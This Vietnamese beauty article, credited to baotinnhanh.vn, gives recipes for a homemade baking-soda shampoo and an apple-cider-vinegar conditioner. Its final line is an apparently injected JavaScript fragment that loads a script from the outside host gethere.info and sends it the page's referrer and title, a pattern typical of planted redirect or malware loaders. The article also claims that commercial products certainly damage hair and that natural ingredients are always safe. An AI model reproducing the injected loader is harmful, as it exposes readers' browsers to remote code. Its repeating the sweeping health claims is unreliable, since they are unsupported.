Bật mí công thức pha chế dầu gội, dầu xả từ nguyên liệu thiên nhiên

Việc lựa chọn dầu gội và dầu xả cho tóc trong khi có quá nhiều sản phẩm trôi nổi trên thị trường là vô cùng khó khăn. Sẽ thật tuyệt vời nếu bạn tự pha chế cho mình với những nguyên liệu thiên nhiên.

Thị trường các loại dầu gội và dầu xả chăm sóc tóc hiện nay quá ồ ạt khiến nhiều chị em không biết làm thế nào để tìm cho mình một bí quyết chăm sóc tóc hiệu quả.

Để có một mái tóc bóng mượt và khỏe đẹp, rất nhiều chị em phụ nữ sẵn sàng bỏ ra một số tiền khá lớn cho các sản phẩm dưỡng và chăm sóc tóc. Tuy vậy, sự thực thì hầu hết chúng đều được điều chế từ những chất hóa học và chắc chắn vẫn sẽ gây hại cho mái tóc. Vậy bạn nghĩ sao về việc tự tay điều chế sản phẩm dưỡng tóc từ thiên nhiên tại nhà.

Hình ảnh: Bật mí công thức pha chế dầu gội, dầu xả từ nguyên liệu thiên nhiên số 1

Hãy “chịu khó” dành thời gian tự làm sản phẩm chăm sóc nếu bạn muốn có một mái tóc bồng bềnh sánh mượt

Dầu gội và dầu xả bạn sử dụng hàng ngày hầu hết là những sản phẩm điều chế từ chất hóa học, nên rất dễ hiểu nếu tóc của bạn vẫn bị xơ và gãy rụng mặc dù bạn đã không hề đi làm tóc hay nhuộm tóc trong một thời gian dài. Với công thức dưới đây cùng với một chút thời gian chuẩn bị, bạn chắc chắn sẽ không cần đến những sản phẩm dầu gội trên thị trường nữa.

Baotinnhanh.vn mách bạn bí quyết tự làm dầu gội và dầu xả từ những nguyên liệu thiên nhiên

Hình ảnh: Bật mí công thức pha chế dầu gội, dầu xả từ nguyên liệu thiên nhiên số 2

Nhiều loại dầu gội đầu và dầu xả trên thị trường không đảm bảo chất lượng sẽ làm hỏng tóc bạn ngay sau một thời gian sử dụng

Nguyên liệu cần thiết

– Bột baking soda và nước theo tỷ lệ 1:3

– Hai giọt viatmin E

Cho các thành phần trên vào trong một chai dầu gội đầu cũ và trộn đều lên, và bây giờ bạn đã có dầu gội đầu hoàn hảo cho mái tóc của mình rồi đó. Rất dễ dàng và nhanh chóng! Và mặc dù nó không tạo bọt, nhưng lại có tác dụng làm sạch da đầu vô cùng hiệu quả nữa.

Hình ảnh: Bật mí công thức pha chế dầu gội, dầu xả từ nguyên liệu thiên nhiên số 3

Những nguyên liệu về thiên nhiên luôn an toàn cho tóc của bạn

Lưu ý: Tóc của bạn có thể sẽ bị dầu và nhanh bết hơn trong tuần đầu tiên thực hiện, bởi sau một thời gian dài sử dụng dầu gội đầu tạo bọt chứa kiềm, da đầu của bạn cần phải điều tiết lại cơ chế tiết dầu.Sau khi bạn rửa sạch tóc và da đầu, tiếp đến sẽ là công đoạn sử dụng xả dưỡng tóc tự chế:

– Giấm táo trộn với nước theo tỷ lệ 1:4- Hai giọt tinh dầu thiên nhiên (ở công đoạn này bạn có thể thỏa thích lựa chọn mùi mà mình yêu thích: lavender, hoa hồng đen, vanilla …)Sau khi thoa xả lên khắp tóc của bạn, hãy rửa sạch tóc với nước lạnh để nó có thể giữ được độ ẩm và trở nên bóng mượt hơn. Chúc bạn có một mái tóc luôn khỏe đẹp và óng mượt cho ngày hè càng thêm rực rỡ

Theo Trang Nhung baotinnhanh.vn

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;